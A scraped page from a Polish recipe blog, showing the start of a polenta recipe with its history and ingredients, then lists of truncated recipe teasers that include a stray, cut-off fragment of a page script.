Polenta
Źródło: https://rajchelewa.blogspot.com/2024/06/polenta.html
PolentaProsta, wiejska potrawa znana we Włoszech już w średniowieczu. Jest też popularna na Bałkanach (narodowe danie Rumunii) czy w Ukrainie pod nazwą mamałyga lub banusz. Możemy ją jeść bez dodatków lub na przykład z gulaszem, okrasą z boczku wędzonego. Nasza polenta będzie przyprawiona tyko solą i odrobiną sera gouda.Składniki:2,5 szklanki wody2/3 szklanki kaszki kukurydzianejpół łyżeczki soli15 dkg sera gouda2 łyżki masła klarowanegoSposób wykonania:Wodę...
Najnowsze przepisy
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 14
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 18
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 21
Pyszny przepis na noodle z mięsem mielonym. Szybki,... ⇖ 20
Wyobraź sobie ten moment: wyjmujesz z piekarnika idealną... ⇖ 12
Przepisy z bloga
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 64
Uszka z mięsem drobiowo -wieprzowym, idealne do barszczu... ⇖ 170
W Wielkopolsce makiełki to tradycyjny wigilijny deser. W... ⇖ 56
Tradycyjny domowy obiad z roladami z karkówki i pysznym... ⇖ 46
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 356
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 261
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 209
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 177
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 168
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 150
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 68
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 64






































